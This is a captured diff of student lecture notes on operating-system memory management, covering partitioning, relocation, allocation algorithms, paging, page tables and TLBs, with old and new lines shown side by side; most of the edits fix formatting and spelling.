There is no reason the read and write count cannot be changed at the same time. If you were to use the same semaphore then you would be limiting the parallelism of your code (slowing run time). There is no reason the read and write counts cannot be changed at the same time. If you were to use the same semaphore, you would be limiting the parallelism of your code (slowing run time).
In the case `iWriteCount == 1` the `sReadTry` is set from 1 -> 0, meaning that no new readers can attempt to read. For the writer to begin writing, it must wait for the readers to finish reading (due to the `sResource` semaphore. In the case `iWriteCount == 1`, `sReadTry` is set from 1 -> 0, meaning that no new readers can attempt to read. For the writer to begin writing, it must wait for the readers to finish reading (due to the `sResource` semaphore).
So when `iReadCount --`, the reader checks if it is the last reader by `iReadCount == 0`, and if it is it unlocks `sResource` (-1->0) so that the writers can write. If more readers show up, they cannot enter as `sReadTry == -1`. So when `iReadCount --`, the reader checks if it is the last reader by `iReadCount == 0`, and if it is it unlocks `sResource` (-1->0) so that the writers can write. If more readers show up, they cannot enter as `sReadTry == -1`.
The last writer does the same thing, but instead of unlocking the resource it unlocks the `sReadTry` semaphore. The last writer does the same thing, but instead of unlocking the resource it unlocks the `sReadTry` semaphore.
+52 -60
View File
@@ -4,10 +4,10 @@
Computers typically have memory hierarchies: Computers typically have memory hierarchies:
> * Registers > - Registers
> * L1/L2/L3 cache > - L1/L2/L3 cache
> * Main memory (RAM) > - Main memory (RAM)
> * Disks > - Disks
**Higher Memory** is faster, more expensive and volatile. **Lower Memory** is slower, cheaper and non-volatile. **Higher Memory** is faster, more expensive and volatile. **Lower Memory** is slower, cheaper and non-volatile.
@@ -15,15 +15,13 @@ The operating system provides **memory abstraction** for the user. Otherwise mem
### OS Responsibilities ### OS Responsibilities
* Allocate/de-allocate memory when requested by processes, keep track of all used/unused memory. - Allocate/deallocate memory when requested by processes and keep track of all used/unused memory.
* Distribute memory between processes and simulate an **indefinitely large** memory space. The OS must create the illusion of having infinite main memory, processes assume they have access to all main memory. - Distribute memory between processes and simulate an **indefinitely large** memory space. The OS must create the illusion of having infinite main memory. Processes assume they have access to all main memory.
* **Control access** when multi programming is applied. - **Control access** when multi-programming is applied.
* **Transparently** move data from **memory** to **disk** and vice versa. - **Transparently** move data from **memory** to **disk** and vice versa.
#### Partitioning #### Partitioning
![img](assets/A.png)
##### Contiguous memory management ##### Contiguous memory management
Allocates memory in **one single block** without any holes or gaps. Allocates memory in **one single block** without any holes or gaps.
@@ -36,48 +34,44 @@ Where memory is allocated in multiple blocks, or segments, which may not be plac
**Multi-programming** with **fixed partitions** **Multi-programming** with **fixed partitions**
* Fixed **equal** sized partitions - Fixed **equal-sized** partitions
* Fixed non-equal sized partitions - Fixed non-equal-sized partitions
**Multi-programming** with **dynamic partitions** **Multi-programming** with **dynamic partitions**
#### Mono-programming #### Mono-programming
> * Only one single user process is in memory/executed at any point in time. > - Only one single user process is in memory/executed at any point in time.
> * A fixed region of memory is allocated to the OS & kernal, the remaining memory is reserved for a single process > - A fixed region of memory is allocated to the OS and kernel. The remaining memory is reserved for a single process
> * This process has direct access to physical memory (no address translation takes place) > - This process has direct access to physical memory (no address translation takes place)
> * Every process is allocated **contiguous block memory** (no holes or gaps) > - Every process is allocated **a contiguous block of memory** (no holes or gaps)
> * One process is allocated the **entire memory space** and the process is always located in the same address space. > - One process is allocated the **entire memory space** and the process is always located in the same address space.
> * **No protection** between different user processes required. Also no protection between the running process and the OS, so sometimes that process can access pieces of the OS its not meant to. > - **No protection** between different user processes is required. There is also no protection between the running process and the OS, so sometimes that process can access pieces of the OS it's not meant to.
> >
> * Overlays enable the **programmer** to use **more memory than available**. > - Overlays enable the **programmer** to use **more memory than available**.
![img](assets/B.png) ##### Shortcomings of Mono-Programming
##### Short comings of mono-programming > - Since a process has direct access to the physical memory, it may have access to the OS memory.
> - The OS can be seen as a process - so we have **two processes anyway**.
> - **Low utilisation** of hardware resources (CPU, I/O devices etc)
> - Mono-programming is unacceptable as **multi-programming is expected** on modern machines
> * Since a process has direct access to the physical memory, it may have access to the OS memory. **Direct memory access** and **mono-programming** are common in basic embedded systems and modern consumer electronics, e.g. washing machines, microwaves and cars.
> * The OS can be seen as a process - so we have **two processes anyway**.
> * **Low utilisation** of hardware resources (CPU, I/O devices etc)
> * Mono-programming is unacceptable as **multi-programming is excepted** on modern machines
**Direct memory access** and **mono-programming** are common in basic embedded systems and modern consumer electronics eg washing machines, microwaves, cars etc.
##### Simulating Multi-Programming ##### Simulating Multi-Programming
We can simulate multi-programming through **swapping** We can simulate multi-programming through **swapping**
* **Swap process** out to the disk and load a new one (context switches would become **time consuming**) - **Swap process** out to the disk and load a new one (context switches would become **time consuming**)
Why Multi-Programming is better theoretically Why Multi-Programming is better theoretically
> * There are *n* **processes in memory** > - There are *n* **processes in memory**
> * A process spends *p* percent of its time **waiting for I/O** > - A process spends *p* percent of its time **waiting for I/O**
> * **CPU Utilisation** is calculated as 1 minus the time that all processes are waiting for I/O > - **CPU Utilisation** is calculated as 1 minus the time that all processes are waiting for I/O
> * The probability that **all** *n* **processes are waitying for I/O is *p*^n^ > - The probability that **all** *n* **processes are waiting for I/O** is $p^{n}$
> * Therefore CPU utilisation is given by $1 - p^{n}$ > - Therefore CPU utilisation is given by $1 - p^{n}$
![cpu_util_form](assets/C.png)
With an **I/O wait time of 20%** almost **100% CPU utilisation** can be achieved with four processes ($1-0.2^{4}$) With an **I/O wait time of 20%** almost **100% CPU utilisation** can be achieved with four processes ($1-0.2^{4}$)
@@ -89,49 +83,47 @@ CPU utilisation **goes up** with the **number of processes** and **down** for **
**Assume that**: **Assume that**:
> * A computer has one megabyte of memory > - A computer has one megabyte of memory
> * The OS takes up 200k, leaving room for four 200k processes > - The OS takes up 200k, leaving room for four 200k processes
**Then:** **Then:**
> * If we have an I/O wait time of 80%, then we will achieve just under 60% CPU utilisation (1-0.8^4^) > - If we have an I/O wait time of 80%, then we will achieve just under 60% CPU utilisation ($1-0.8^{4}$)
> * If we add another megabyte of memory, it would allow us to run another five processes. We can now achieve about **87%** CPU utilisation (1-0.8^9^) > - If we add another megabyte of memory, it would allow us to run another five processes. We can now achieve about **87%** CPU utilisation ($1-0.8^{9}$)
> * If we add another megabyte of memory (14 processes) we find that CPU utilisation will increase to around **96%** > - If we add another megabyte of memory (14 processes) we find that CPU utilisation will increase to around **96%**
##### Caveats ##### Caveats
* This model assumes that all processes are independent, this is not true. - This model assumes that all processes are independent. This is not true.
* More complex models could be built using **queuing theory** but we still use this simplistic model to make **approximate predictions** - More complex models could be built using **queuing theory** but we still use this simplistic model to make **approximate predictions**
#### Fixed Size Partitions #### Fixed Size Partitions
* Divide memory into **static**, **contiguous** and **equal sized** partitions that have a fixed **size and location**. - Divide memory into **static**, **contiguous** and **equal sized** partitions that have a fixed **size and location**.
* Any process can take **any** partition. (as long as its large enough) - Any process can take **any** partition (as long as it's large enough)
* Allocation of **fixed equal sized partitions to processes is trivial** - Allocation of **fixed equal sized partitions to processes is trivial**
* Very **little overhead** and **simple implementation** - Very **little overhead** and **simple implementation**
* The OS keeps a track of which partitions are being **used** and which are **free**. - The OS keeps track of which partitions are being **used** and which are **free**.
##### Disadvantages ##### Disadvantages
* Partition may be necessarily large - Partition may be necessarily large
* Low memory utilisation - Low memory utilisation
* Internal fragmentation - Internal fragmentation
* **Overlays** must be used if a program does not fit into a partition (burden on the programmer) - **Overlays** must be used if a program does not fit into a partition (burden on the programmer)
#### Fixed Partitions of non-equal size #### Fixed Partitions of non-equal size
* Divide memory into **static** and **non-equal sized partitions** that have **fixed size and location** - Divide memory into **static** and **non-equal sized partitions** that have **fixed size and location**
* Reduces **internal fragmentation** - Reduces **internal fragmentation**
* The **allocation** of processes to partitions must be **carefully considered**. - The **allocation** of processes to partitions must be **carefully considered**.
![process_alloc](assets/E.png)
**One private queue per partition**: **One private queue per partition**:
* Assigns each process to the smallest partition that it would fit in. - Assigns each process to the smallest partition that it would fit in.
* Reduces **internal fragmentation**. - Reduces **internal fragmentation**.
* Can reduce memory utilisation (e.g. lots of small jobs result in unused large partitions) - Can reduce memory utilisation (e.g. lots of small jobs result in unused large partitions)
**A single shared queue:** **A single shared queue:**
* Increased internal fragmentation as small processes are allocated into big partitions. - Increased internal fragmentation as small processes are allocated into big partitions.
+41 -45
View File
@@ -26,7 +26,7 @@ int main() {
The addresses will be the same, as memory management within a process is the same. The process doesn't know where it is in memory, however the process is allocated the same amount of memory and the address is relative to the process. The addresses will be the same, as memory management within a process is the same. The process doesn't know where it is in memory, however the process is allocated the same amount of memory and the address is relative to the process.
If the process is run twice, they are allocated two different memory spaces, so the addresses will be the same. If the process is run twice, the two instances are allocated different memory spaces, so the addresses will be the same.
[explanation 8:05] [explanation 8:05]
@@ -34,9 +34,9 @@ If the process is run twice, they are allocated two different memory spaces, so
When a program is run, it does not know in advance which partition it will occupy. When a program is run, it does not know in advance which partition it will occupy.
* The program **cannot** simply **generate static addresses** (like jump instructions) that are absolute - The program **cannot** simply **generate static addresses** (like jump instructions) that are absolute
* **Addresses should be relative to where the program has been loaded**. - **Addresses should be relative to where the program has been loaded**.
* Relocation must be **solved in an operating system** that allows **processes to run at changing memory locations**. - Relocation must be **solved in an operating system** that allows **processes to run at changing memory locations**.
**Protection**: Once you can have two programs in memory at the same time, protection must be enforced. **Protection**: Once you can have two programs in memory at the same time, protection must be enforced.
@@ -44,52 +44,50 @@ When a program is run, it does not know in advance which partition it will occup
**Logical Address**: is a memory address seen by the process **Logical Address**: is a memory address seen by the process
* It is independent of the current physical memory assignment - It is independent of the current physical memory assignment
* It is relative to the start of the program - It is relative to the start of the program
**Physical address**: refers to an actual location in main memory **Physical address**: refers to an actual location in main memory
The **logical address space** must be **mapped** onto the **machines physical address space**. The **logical address space** must be **mapped** onto the **machine's physical address space**.
### Static Relocation ### Static Relocation
This happens at compile time, a process has to be located at the same location every single time (impractical) This happens at compile time. A process has to be located at the same location every single time (impractical).
### Dynamic Relocation ### Dynamic Relocation
This happens at load time This happens at load time
* An **offset is added to every logical address** to account for its physical location in memory. - An **offset is added to every logical address** to account for its physical location in memory.
* **Slows down the loading** of a process, does not account for **swapping** - **Slows down the loading** of a process, does not account for **swapping**
### Dynamic Relocation at run-time ### Dynamic Relocation at run-time
Two special purpose registers are maintained in the CPU (the **MMU**) containing a **base address** and **limit** Two special-purpose registers are maintained in the CPU (the **MMU**), containing a **base address** and **limit**.
> * The **base register** stores the **start address** of the partition. > - The **base register** stores the **start address** of the partition.
> * The **limit register** holds the **size** of the partition. > - The **limit register** holds the **size** of the partition.
> >
> At **run-time** > At **run-time**
> >
> * The base register is added to the **logical (relative) address** to generate the physical address. > - The base register is added to the **logical (relative) address** to generate the physical address.
> * The resulting address is **compared** against the **limit register**. This allows us to see the bounds of where the process exists. > - The resulting address is **compared** against the **limit register**. This allows us to see the bounds of where the process exists.
> >
> NOTE: This requires **hardware support** (which didn't exist in the early days). > NOTE: This requires **hardware support** (which didn't exist in the early days).
<img src="assets/G.png" alt="registers" style="zoom:80%;" />
#### Dynamic Partitioning #### Dynamic Partitioning
**Fixed partitioning** results in **internal fragmentation**: **Fixed partitioning** results in **internal fragmentation**:
> An exact match between the requirements of the process and the available partitions **may not exist**. > An exact match between the requirements of the process and the available partitions **may not exist**.
> >
> * This means the partition may **not be used in its entirety**. > - This means the partition may **not be used in its entirety**.
**Dynamic Partitioning** **Dynamic Partitioning**
> * A **variable number of partitions** of which the **size** and **starting address** can **change over time**. > - A **variable number of partitions** of which the **size** and **starting address** can **change over time**.
> * A process is allocated the **exact amount** of **contiguous memory it requires**, thereby preventing internal fragmentation. > - A process is allocated the **exact amount** of **contiguous memory it requires**, thereby preventing internal fragmentation.
![dynamic_partitioning](assets/h.png) ![dynamic_partitioning](assets/h.png)
@@ -97,10 +95,10 @@ Two special purpose registers are maintained in the CPU (the **MMU**) containing
Reasons for **swapping**: Reasons for **swapping**:
> * Some processes only **run occasionally**. > - Some processes only **run occasionally**.
> * We have more **processes** than **partitions**. > - We have more **processes** than **partitions**.
> * A process's **memory requirements** may have **changed**. > - A process's **memory requirements** may have **changed**.
> * The **total amount of memory that is required** for the process **exceeds the available memory**. > - The **total amount of memory that is required** for the process **exceeds the available memory**.
For any given process, we might not know the exact **memory requirements**. This is because processes may involve dynamic parts. For any given process, we might not know the exact **memory requirements**. This is because processes may involve dynamic parts.
@@ -110,15 +108,13 @@ For any given process, we might not know the exact **memory requirements**. This
> >
> The 'bit extra' will try and account for the dynamic nature of the process. > The 'bit extra' will try and account for the dynamic nature of the process.
> >
> If the process out grows it's partition, then it is shuttled out onto the main disk and allocated a new partition. > If the process outgrows its partition, it is shuttled out onto the main disk and allocated a new partition.
![External Fragmentation](assets/I.png)
##### External Fragmentation ##### External Fragmentation
> * Swapping a process out of memory will **create 'a hole'** > - Swapping a process out of memory will **create 'a hole'**
> * A new process may not **use the entire 'hole'**, leaving a small **unused block** > - A new process may not **use the entire 'hole'**, leaving a small **unused block**
> * A new process may be **too large for a given 'hole'** > - A new process may be **too large for a given 'hole'**
> >
> The **overhead** of memory **compaction** to **recover holes** can be **prohibitive** and requires **dynamic relocation**. > The **overhead** of memory **compaction** to **recover holes** can be **prohibitive** and requires **dynamic relocation**.
@@ -126,26 +122,26 @@ For any given process, we might not know the exact **memory requirements**. This
**Bitmaps**: **Bitmaps**:
> * The simplest data structure that can be used is a **bitmap**. > - The simplest data structure that can be used is a **bitmap**.
> * **Memory is split into blocks** of 4 Kb size. > - **Memory is split into blocks** of 4 Kb size.
> * A bitmap is set up so that each **bit is 0** if the memory block is free, and 1 if the **block is being used** > - A bitmap is set up so that each **bit is 0** if the memory block is free, and 1 if the **block is being used**
> * 32 Mb memory / 4 Kb blocks = 8192 bitmap entries > - 32 Mb memory / 4 Kb blocks = 8192 bitmap entries
> * 8192 bits occupy 1 Kb of storage (8192 / 8) > - 8192 bits occupy 1 Kb of storage (8192 / 8)
> * The size of this bitmap will depend on the **size of the memory** and the **size of the allocation unit**. > - The size of this bitmap will depend on the **size of the memory** and the **size of the allocation unit**.
> * To find a hole of say 128 K, then a group of **32 adjacent bits set to 0** must be found > - To find a hole of say 128 K, then a group of **32 adjacent bits set to 0** must be found
> * Typically a long operation, the longer it takes, the lower the CPU utilisation is. > - Typically a long operation, the longer it takes, the lower the CPU utilisation is.
> * A **trade-off exists** between the **size of the bitmap** and the **size of the blocks** > - A **trade-off exists** between the **size of the bitmap** and the **size of the blocks**
> * The size of the bitmaps can become prohibitive for small blocks and may make searching the bitmap slower > - The size of the bitmaps can become prohibitive for small blocks and may make searching the bitmap slower
> * Larger blocks may increase internal fragmentation. > - Larger blocks may increase internal fragmentation.
> * **Bitmaps are rarely used** because of this trade off > - **Bitmaps are rarely used** because of this trade-off
**Linked List**: **Linked List**:
A more **sophisticated data structure** is required to deal with a **variable number** of **free and used partitions**. A more **sophisticated data structure** is required to deal with a **variable number** of **free and used partitions**.
> * A linked list consists of a **number of entries** (links) > - A linked list consists of a **number of entries** (links)
> * Each link **contains data items** e.g. **start of memory block**, **size** and a flag for free and allocated > - Each link **contains data items** e.g. **start of memory block**, **size** and a flag for free and allocated
> * It also contains a pointer to the next link. > - It also contains a pointer to the next link.
![Memory Management with linked lists](assets/j.png) ![Memory Management with linked lists](assets/j.png)
+46 -52
View File
@@ -6,94 +6,88 @@
#### First Fit #### First Fit
> * First fit starts scanning **from the start** of the linked list until a link is found, which can fit the process > - First fit starts scanning **from the start** of the linked list until a link is found, which can fit the process
> * If the requested space is **the exact same size** as the 'hole', all the space is allocated > - If the requested space is **the exact same size** as the 'hole', all the space is allocated
> * Otherwise the free link is split into two: > - Otherwise the free link is split into two:
> * The first entry is set to the **size requested** and marked **used** > - The first entry is set to the **size requested** and marked **used**
> * The second entry is set to **remaining size** and **free**. > - The second entry is set to **remaining size** and **free**.
#### Next Fit #### Next Fit
> * The next fit algorithm maintains a record of where it got to last time and restarts it's search from there > - The next fit algorithm maintains a record of where it got to last time and restarts its search from there
> * This gives an even chance to all memory to get allocated (first fit concentrates on the start of the list) > - This gives an even chance to all memory to get allocated (first fit concentrates on the start of the list)
> * However simulations have been run which show that this is worse than first fit. > - However simulations have been run which show that this is worse than first fit.
> * This is because a side effect of **first fit** is that it leaves larger partitions towards the end of memory, which is useful for larger processes. > - This is because a side effect of **first fit** is that it leaves larger partitions towards the end of memory, which is useful for larger processes.
#### Best Fit #### Best Fit
> * The best fit algorithm always **searches the entire linked list** to find the smallest hole that's big enough to fit the memory requirements of the process. > - The best fit algorithm always **searches the entire linked list** to find the smallest hole that's big enough to fit the memory requirements of the process.
> * It is **slower** than first fit > - It is **slower** than first fit
> * It also results in more wasted memory. As a exact sized hole is unlikely to be found, this leaves tiny (and useless) holes. > - It also results in more wasted memory. As an exact-sized hole is unlikely to be found, this leaves tiny (and useless) holes.
> >
> Complexity: $O(n)$ > Complexity: $O(n)$
#### Worst Fit #### Worst Fit
> Tiny holes are created when best fit split an empty partition. > Tiny holes are created when best fit splits an empty partition.
> >
> * The **worst fit algorithm** finds the **largest available empty partition** and splits it. > - The **worst fit algorithm** finds the **largest available empty partition** and splits it.
> * The **left over partition** is hopefully **still useful** > - The **leftover partition** is hopefully **still useful**
> * However simulations show that this method **isn't very good**. > - However simulations show that this method **isn't very good**.
> >
> Complexity: $O(n)$ > Complexity: $O(n)$
#### Quick Fit #### Quick Fit
> * Quick fit maintains a **list of commonly used sizes** > - Quick fit maintains a **list of commonly used sizes**
> * For example a separate list for each of 4 Kb, 8 Kb, 12 Kb etc holes > - For example a separate list for each of 4 Kb, 8 Kb, 12 Kb etc holes
> * Odd sized holes can either go into the nearest size or into a special separate list. > - Odd sized holes can either go into the nearest size or into a special separate list.
> * This is much f**aster than the other solutions**, however similar to **best fit** it creates **many tiny holes**. > - This is much **faster than the other solutions**, but, similarly to **best fit**, it creates **many tiny holes**.
> * Finding neighbours for **coalescing** (combining empty partitions) becomes more difficult & time consuming. > - Finding neighbours for **coalescing** (combining empty partitions) becomes more difficult & time consuming.
### Coalescing ### Coalescing
Coalescing (join together) takes place when **two adjacent entries** in the linked list become free. Coalescing (join together) takes place when **two adjacent entries** in the linked list become free.
* Both neighbours are examined when a **block is freed** - Both neighbours are examined when a **block is freed**
* If either (or both) are also **free** then the two (or three) **entries are combined** into one larger block by adding up the sizes - If either (or both) are also **free** then the two (or three) **entries are combined** into one larger block by adding up the sizes
* The earlier block in the linked list gives the **start point** - The earlier block in the linked list gives the **start point**
* The **separate links are deleted** and a **single link inserted**. - The **separate links are deleted** and a **single link inserted**.
### Compacting ### Compacting
Even with coalescing happening automatically, **free blocks** may still be **distributed across memory** Even with coalescing happening automatically, **free blocks** may still be **distributed across memory**
> * Compacting can be used to join free and used memory > - Compacting can be used to join free and used memory
> * However compacting is more **difficult and time consuming** to implement then coalescing. > - However, compacting is more **difficult and time-consuming** to implement than coalescing.
> * Each **process is swapped** out & **free space coalesced**. > - Each **process is swapped** out & **free space coalesced**.
> * Processes are swapped back in at lowest available location. > - Processes are swapped back in at lowest available location.
## Paging ## Paging
Paging uses the principles of **fixed partitioning** and **code re-location** to devise a new **non-contiguous management scheme** Paging uses the principles of **fixed partitioning** and **code relocation** to devise a new **non-contiguous management scheme**.
> * Memory is split into much **smaller blocks** and **one or multiple blocks** are allocated to a process (e.g. a 11 Kb process would take 3 blocks of 4 Kb) > - Memory is split into much **smaller blocks** and **one or multiple blocks** are allocated to a process (e.g. an 11 Kb process would take 3 blocks of 4 Kb)
> * These blocks **do not have to be contiguous in main memory**, but **the process still perceives them to be contiguous** > - These blocks **do not have to be contiguous in main memory**, but **the process still perceives them to be contiguous**
> * Benefits: > - Benefits:
> * **Internal fragmentation** is reduced to the **last block only** (e.g. previous example the third block, only 3 Kb will be used) > - **Internal fragmentation** is reduced to the **last block only** (e.g. previous example the third block, only 3 Kb will be used)
> * There is **no external fragmentation**, since physical blocks are **stacked directly onto each other** in main memory. > - There is **no external fragmentation**, since physical blocks are **stacked directly onto each other** in main memory.
![Paging in main memory](assets/L.png)
![Paging processor's view](assets/M.png)
![Paging](assets/p.png) ![Paging](assets/p.png)
A **page** is a **small block** of **contiguous memory** in the **logical address space** (as seen by the process) A **page** is a **small block** of **contiguous memory** in the **logical address space** (as seen by the process)
* A **frame** is a **small contiguous block** in **physical memory**. - A **frame** is a **small contiguous block** in **physical memory**.
* Pages and frames (usually) have the **same size**: - Pages and frames (usually) have the **same size**:
* The size is usually a power of 2. - The size is usually a power of 2.
* Size range between 512 bytes and 1 Gb. (most common 4 Kb pages & frames) - Sizes range between 512 bytes and 1 Gb (most commonly 4 Kb pages and frames)
**Logical address** (page number, offset within page) needs to be **translated** into a **physical address** (frame number, offset within frame) **Logical address** (page number, offset within page) needs to be **translated** into a **physical address** (frame number, offset within frame)
* Multiple **base registers** will be required - Multiple **base registers** will be required
* Each logical page needs a **separate base register** that specifies the start of the associated frame - Each logical page needs a **separate base register** that specifies the start of the associated frame
* i.e a **set of base registers** has to be maintained for each process - i.e. a **set of base registers** has to be maintained for each process
* The base registers are stored in the **page table** - The base registers are stored in the **page table**
![Mapping page tables](assets/Q.png)
The page table can be seen as a **function**, that **maps the page number** of the logical address **onto the frame number** of the physical address The page table can be seen as a **function**, that **maps the page number** of the logical address **onto the frame number** of the physical address
@@ -101,11 +95,11 @@ $$
frameNumber = f(pageNumber) frameNumber = f(pageNumber)
$$ $$
* The **page number** is used as an **index to the page table** that lists the **location of the associated frame**. - The **page number** is used as an **index to the page table** that lists the **location of the associated frame**.
* It is the OS' duty to maintain a list of **free frames**. - It is the OS' duty to maintain a list of **free frames**.
![address translation](assets/r.png) ![address translation](assets/r.png)
We can see that the **only difference** between the logical address and physical address is the **4 left most bits** (the **page number and frame number**). As **pages and frames are the same size**, then the **offset value will be the same for both**. We can see that the **only difference** between the logical address and physical address is the **four leftmost bits** (the **page number and frame number**). As **pages and frames are the same size**, the **offset value will be the same for both**.
This allows for **more optimisation** which is important as this translation will need to be **run for every memory read/write** call. This allows for **more optimisation** which is important as this translation will need to be **run for every memory read/write** call.
+51 -57
View File
@@ -4,29 +4,27 @@
Benefits of paging Benefits of paging
* **Reduced internal fragmentation** - **Reduced internal fragmentation**
* No **external fragmentation** - No **external fragmentation**
* Code execution and data manipulation are usually **restricted to a small subset** (i.e limited number of pages) at any point in time. - Code execution and data manipulation are usually **restricted to a small subset** (i.e. a limited number of pages) at any point in time.
* **Not all pages** have to be **loaded in memory** at the **same time** => **virtual memory** - **Not all pages** have to be **loaded in memory** at the **same time** => **virtual memory**
* Loading an entire set of pages for an entire program/data set into memory is **wasteful** - Loading an entire set of pages for an entire program/data set into memory is **wasteful**
* Desired blocks could be **loaded on demand**. - Desired blocks could be **loaded on demand**.
* This is called the **principle of locality**. - This is called the **principle of locality**.
#### Memory as a linear array #### Memory as a linear array
> * Memory can be seen as one **linear array** of **bytes** (words) > - Memory can be seen as one **linear array** of **bytes** (words)
> * Address ranges from $0 - (N-1)$ > - Address ranges from $0 - (N-1)$
> * N address lines can be used to specify $2^N$ distinct addresses. > - N address lines can be used to specify $2^N$ distinct addresses.
### Address Translation ### Address Translation
* A **logical address** is relative to the start of the **program (memory)** and consists of two parts: - A **logical address** is relative to the start of the **program (memory)** and consists of two parts:
* The **right most** $m$ **bits** that represent the **offset within the page** (and frame) . - The **rightmost** $m$ **bits** that represent the **offset within the page** (and frame).
* $m$ often is 12 bits - $m$ often is 12 bits
* The **left most** $n$ **bits** that represent the **page number** (and frame number they're the same thing) - The **leftmost** $n$ **bits** that represent the **page number** (and frame number - they're the same thing)
* $n$ is often 4 bits - $n$ is often 4 bits
![address composition](assets/S.png)
#### Steps in Address Translation #### Steps in Address Translation
@@ -36,7 +34,7 @@ Benefits of paging
> >
> **Hardware Implementation** > **Hardware Implementation**
> >
> 1. The CPU's **memory management uni** (MMU) intercepts logical addresses > 1. The CPU's **memory management unit** (MMU) intercepts logical addresses
> 2. MMU uses a page table as above > 2. MMU uses a page table as above
> 3. The resulting **physical address** is put on the **memory bus**. > 3. The resulting **physical address** is put on the **memory bus**.
> >
@@ -46,7 +44,7 @@ Benefits of paging
![virtual memory](assets/t.png) ![virtual memory](assets/t.png)
We have more pages here, than we can physically store as frames. We have more pages here than we can physically store as frames.
**Resident set**: The set of pages that are loaded in main memory. (In the above image, the resident set consists of the pages not marked with an 'X') **Resident set**: The set of pages that are loaded in main memory. (In the above image, the resident set consists of the pages not marked with an 'X')
@@ -54,10 +52,10 @@ We have more pages here, than we can physically store as frames.
> A **page fault** is generated if the processor accesses a page that is **not in memory** > A **page fault** is generated if the processor accesses a page that is **not in memory**
> >
> * A page fault results in an interrupt (process enters **blocked state**) > - A page fault results in an interrupt (process enters **blocked state**)
> * An **I/O operation** is started to bring the missing page into main memory > - An **I/O operation** is started to bring the missing page into main memory
> * A **context switch** (may) take place. > - A **context switch** (may) take place.
> * An **interrupt signal** shows that the I/O operation is complete and the process **enters the ready state**. > - An **interrupt signal** shows that the I/O operation is complete and the process **enters the ready state**.
``` ```
1. Trap operating system 1. Trap operating system
@@ -78,59 +76,55 @@ We have more pages here, than we can physically store as frames.
#### Benefits #### Benefits
> * Being able to maintain **more processes** in main memory through the use of virtual memory **improves CPU utilisation** > - Being able to maintain **more processes** in main memory through the use of virtual memory **improves CPU utilisation**
> * Individual processes take up less memory since they are only partially loaded > - Individual processes take up less memory since they are only partially loaded
> * Virtual memory allows the **logical address space** (processes) to be larger than **physical address space** (main memory) > - Virtual memory allows the **logical address space** (processes) to be larger than **physical address space** (main memory)
> * 64 bit machine => 2^64^ logical addresses (theoretically) > - 64-bit machine => $2^{64}$ logical addresses (theoretically)
#### Contents of a page entry #### Contents of a page entry
> * A **present/absent bit** that is set if the frame is in main memory or not. > - A **present/absent bit** that is set if the frame is in main memory or not.
> * A **modified bit** that is set if the page/frame has been modified (only modified pages have to be written back to the disk when evicted. This makes sure the pages and frames are kept in sync). > - A **modified bit** that is set if the page/frame has been modified (only modified pages have to be written back to the disk when evicted. This makes sure the pages and frames are kept in sync).
> * A **referenced bit** that is set if the page is in use (If you needed to free up space in main memory, move a page, however it is important that a page not in use is moved). > - A **referenced bit** that is set if the page is in use (If you needed to free up space in main memory, move a page, however it is important that a page not in use is moved).
> * **Protection and sharing bits**: read, write, execute or various different combos of those. > - **Protection and sharing bits**: read, write, execute or various different combinations of those.
![page entry meta data](assets/U.png)
##### Page Table Size ##### Page Table Size
> * On a **16 bit machine**, the total address space is 2^16^ > - On a **16-bit machine**, the total address space is $2^{16}$
> * Assuming that 10 bits are used for the offset (2^10^) > - Assuming that 10 bits are used for the offset ($2^{10}$)
> * 6 bits can be used to number the pages > - 6 bits can be used to number the pages
> * This means 2^6^ or 64 pages can be maintained > - This means $2^{6}$ or 64 pages can be maintained
> * On a **32 bit machine**, 2^20^ or ~10^6^ pages can be maintained > - On a **32-bit machine**, $2^{20}$ or ~$10^{6}$ pages can be maintained
> * On a **64 bit machine**, this number increases a lot. This means the page table becomes stupidly large. > - On a **64-bit machine**, this number increases a lot. This means the page table becomes extremely large.
Where do we **store page tables with increasing size**? Where do we **store page tables with increasing size**?
* Perfect world would be registers - however this isn't possible due to size - Perfect world would be registers - however this isn't possible due to size
* They will have to be stored in (virtual) **main memory** - They will have to be stored in (virtual) **main memory**
* **Multi-level** page tables - **Multi-level** page tables
* **Inverted page tables** (for large virtual address spaces) - **Inverted page tables** (for large virtual address spaces)
However if the page table is to be stored in main memory, we must maintain acceptable speeds. The solution is to page the page table. However, if the page table is to be stored in main memory, we must maintain acceptable speeds. The solution is to page the page table.
### Multi-level Page Tables ### Multi-level Page Tables
We use a tree-like structure to hold the page tables We use a tree-like structure to hold the page tables
* Divide the page number into - Divide the page number into
* An index to a page table of second level - An index to a second-level page table
* A page within a second level page table - A page within a second-level page table
This means there's no need to keep all the page tables in memory all the time! This means there's no need to keep all the page tables in memory all the time!
![multi level page tables](assets/V.png) The structure described above has two levels of page tables.
The above image has 2 levels of page tables. > - The **root page table** is always maintained in memory.
> - Page tables themselves are **maintained in virtual memory** due to their size.
> * The **root page table** is always maintained in memory.
> * Page tables themselves are **maintained in virtual memory** due to their size.
> >
> Assume that a **fetch** from main memory takes *T* nano-seconds > Assume that a **fetch** from main memory takes *T* nanoseconds
> >
> * With a **single page table level**, access is $2 \cdot T$ > - With a **single page table level**, access is $2 \cdot T$
> * With **two page table levels**, access is $3 \cdot T$ > - With **two page table levels**, access is $3 \cdot T$
> * and so on... > - and so on...
> >
> We can have many levels as the address space in 64 bit computers is so massive. > We can have many levels as the address space in 64-bit computers is so massive.
+77 -81
View File
@@ -1,61 +1,61 @@
12/11/20 12/11/20
## Page Tables Optimisations ## Page Table Optimisations
##### Memory Organisation ##### Memory Organisation
* The **root page table** is always maintained in memory. - The **root page table** is always maintained in memory.
* Page tables themselves are maintained in **virtual memory** due to their size. - Page tables themselves are maintained in **virtual memory** due to their size.
* Assume a **fetch** from main memory takes $T$ time - single page table access is now $2\cdot T$ and **two** page table levels access is $3 \cdot T$. - Assume a **fetch** from main memory takes $T$ time - single page table access is now $2\cdot T$ and **two** page table levels access is $3 \cdot T$.
* Some optimisation needs to be done, otherwise memory access will create a bottleneck to the speed of the computer. - Some optimisation needs to be done; otherwise, memory access will create a bottleneck in the speed of the computer.
### Translation Look Aside Buffers ### Translation Lookaside Buffers
* Translation look aside buffers or TLBs are (usually) located inside the memory management unit - Translation lookaside buffers, or TLBs, are (usually) located inside the memory management unit
* They **cache** the most frequently used page table entries. - They **cache** the most frequently used page table entries.
* As they're stored in cache its super quick. - As they're stored in cache, access is very quick.
* They can be searched in **parallel**. - They can be searched in **parallel**.
* The principle behind TLBs is similar to other types of **caching in operating systems**. They normally store anywhere from 16 to 512 pages. - The principle behind TLBs is similar to other types of **caching in operating systems**. They normally store anywhere from 16 to 512 pages.
